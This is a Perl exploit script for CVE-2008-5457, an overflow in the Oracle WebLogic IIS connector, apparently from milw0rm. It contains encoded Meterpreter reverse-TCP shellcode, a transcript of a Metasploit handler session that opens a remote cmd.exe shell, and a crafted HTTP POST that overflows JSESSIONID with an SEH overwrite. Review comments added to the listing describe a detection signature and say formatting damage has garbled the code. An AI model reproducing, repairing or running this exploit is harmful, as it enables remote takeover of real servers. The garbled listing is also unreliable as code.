Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exp





信息起源:milw0rm.

#!/usr/bin/perl
# No point in keeping this private anymore!
#
# k`sOSe 02/16/2009 CVE-2008-5457
# Tested on w2k sp4 and w2k3 R2 sp2 (no NX)
#
# cohelet framework3.2 # ./msfcli multi/handler PAYLOADwindows/reflectivemeterpreter/reverse_tcp LHOST10.10.10.1 LPORT80 E
# ... Please wait while we load the module tree...
# ... Handler binding to LHOST 0.0.0.0
# ... Started reverse handler
# ... Starting the payload handler...
# ... Transmitting intermediate stager for oversized stage...(191 bytes)
# ... Sending stage (75776 bytes)
# ... Meterpreter session 1 opened (10.10.10.1:80 10.10.10.4:2171)
#
# meterpreter rev2self
# meterpreter execute i f cmd.exe
# Process 3092 created.
# Channel 1 created.
# Microsoft Windows .Version 5.2.3790.
# (C) Copyright 19852003 Microsoft Corp.
#
# c:windowssystem32inetsrv



# LHOST10.10.10.1 LPORT80
# windows/reflectivemeterpreter/reverse_tcp
# ... x86/alpha_mixed succeeded, final size 619
# Encoded payload blob as emitted by the Metasploit tooling named in the three
# comment lines above (the author's notes say x86/alpha_mixed, 619 bytes,
# calling back to 10.10.10.1:80 - the handler session is transcribed in the
# header comments). Alphanumeric encoding is why the bytes below are almost
# entirely printable 0x30-0x5a values.
# NOTE(review): as reproduced on this page the forum formatting has stripped
# punctuation from the listing (the backslashes of the \x escapes, the
# variable sigil and the assignment operator), so this statement is not valid
# Perl and the string is not the byte sequence the author intended. It is kept
# verbatim for reference; do not read it as a working sample.
my shellcode
"xd9xecxd9x74x24xf4x5bx53x59x49x49x49x49x49" .
"x49x49x49x49x43x43x43x43x43x43x43x37x51x5a" .
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" .
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42" .
"x75x4ax49x4bx4cx4bx58x46x36x45x50x45x50x43" .
"x30x50x53x46x35x51x46x51x47x4cx4bx42x4cx47" .
"x54x44x58x4cx4bx50x45x47x4cx4cx4bx51x44x43" .
"x35x44x38x45x51x4bx5ax4cx4bx50x4ax45x48x4c" .
"x4bx51x4ax47x50x43x31x4ax4bx4bx53x50x32x51" .
"x59x4cx4bx47x44x4cx4bx45x51x4ax4ex50x31x4b" .
"x4fx4bx4cx50x31x49x50x4ex4cx47x48x4dx30x43" .
"x44x44x47x49x51x48x4fx44x4dx43x31x49x57x4a" .
"x4bx4bx42x47x4bx43x4cx47x54x42x34x44x35x4b" .
"x51x4cx4bx51x4ax47x54x45x51x4ax4bx43x56x4c" .
"x4bx44x4cx50x4bx4cx4bx51x4ax45x4cx45x51x4a" .
"x4bx4cx4bx43x34x4cx4bx45x51x4ax48x4ax4bx43" .
"x32x50x31x49x50x51x4fx51x4ex51x4dx51x4bx48" .
"x42x45x58x43x30x51x4ex42x4ax46x50x51x49x43" .
"x54x4cx4bx42x39x4cx4bx51x4bx44x4cx4cx4bx51" .
"x4bx45x4cx4cx4bx45x4bx4cx4bx51x4bx44x48x51" .
"x43x45x38x4cx4ex50x4ex44x4ex4ax4cx4bx4fx4e" .
"x36x4dx59x48x47x46x33x45x38x46x34x48x4ax4e" .
"x4fx4cx51x4bx4fx49x46x4dx51x4ax4cx45x50x43" .
"x31x43x30x45x50x50x50x46x37x46x36x51x43x4d" .
"x59x4dx35x4dx38x45x4fx43x30x45x50x43x30x4a" .
"x30x43x31x43x30x45x50x48x36x45x49x42x38x4d" .
"x37x49x34x42x39x42x50x4dx39x4ax4cx4cx39x4e" .
"x4ax43x50x48x59x45x59x4ax55x4ex4dx48x4bx4a" .
"x4dx4bx4cx47x4bx51x47x50x53x46x52x51x4fx46" .
"x53x46x52x45x50x51x4bx4cx4dx50x4bx42x38x46" .
"x31x4bx4fx48x57x4bx39x49x4fx4bx39x48x43x4c" .
"x4dx44x35x44x54x43x5ax45x55x50x59x46x31x46" .
"x33x4bx4fx46x54x4cx4fx4bx4fx50x55x44x44x51" .
"x49x4cx49x44x44x4cx4ex4bx52x4bx42x46x4bx47" .
"x57x50x54x4bx4fx50x37x4bx4fx46x35x51x38x46" .
"x51x49x50x50x50x46x30x46x30x46x30x47x30x46" .
"x30x47x30x50x50x4bx4fx51x45x51x34x4bx39x48" .
"x47x45x38x44x4ax45x5ax44x4ax45x51x43x58x44" .
"x42x45x50x45x50x46x30x4bx39x4dx31x43x5ax42" .
"x30x46x31x51x47x4bx4fx50x55x51x30x43x5ax51" .
"x50x51x4ex46x36x49x51x4ax46x45x56x51x46x49" .
"x51x4ax46x44x48x46x36x43x5ax45x50x4bx4fx46" .
"x35x44x4cx4dx59x49x53x42x4ax43x30x50x56x51" .
"x43x50x57x4bx4fx46x35x44x58x4bx4fx48x53x44" .
"x4ax41x41";


use warnings;
use strict;
use I:Socket::INET;

# Opens a plain TCP connection to the author's lab target (10.10.10.4:80,
# hard-coded) and writes one hand-built HTTP POST. Nothing is ever read back:
# the request is fire-and-forget, and the header comments show the author
# expecting the payload to call out to a separate listener instead.
# NOTE(review): as reproduced here the sigils, the assignment operator and the
# method arrow are missing from this line (forum formatting damage), so the
# listing does not parse as shown.
my sock I:Socket::INET new(PeerAddr \'10.10.10.4\', PeerPort \'80\', Proto \'tcp\');

# Request layout, reading the concatenation below: the `;JSESSIONID` path
# parameter carries 5132 bytes of filler, then the encoded payload padded with
# 'C' to 3000 bytes, then two short backward jumps and a 2-byte partial SEH
# overwrite (per the author's trailing comments), so the request line alone is
# roughly 8 KB before the headers. That is the detection handle: a genuine
# JSESSIONID is a short fixed-length token, and a request whose `;JSESSIONID`
# segment runs to kilobytes is a high-fidelity signature for CVE-2008-5457
# probing in IIS / WAF logs. Capping request-line and URL length at the front
# end rejects this shape regardless of patch level; the actual fix is the
# vendor's updated WebLogic IIS plug-in. The author's own header note ("no
# NX") suggests the SEH technique depends on DEP/SafeSEH being absent - confirm
# against the advisory before relying on that as a mitigation.
# The `Content-Length: 81` header and its 81 filler bytes appear to be only a
# well-formed body so the server parses the request, not part of the overflow.
print sock "POST /index.jsp;JSESSIONID" .
"B" x 5132 .
shellcode .
"C" x (3000length( shellcode)) .
"xe9x43xf4xffxff" . # jmp back
"x90x90xebxf7" . # jmp back
"x76x79" . # SEH partial rewrite
" HTTP/1.0rn" .
"Connection:KeepAlivern" .
"ContentLength: 81rnrn" . "A" x 81 . "rn";
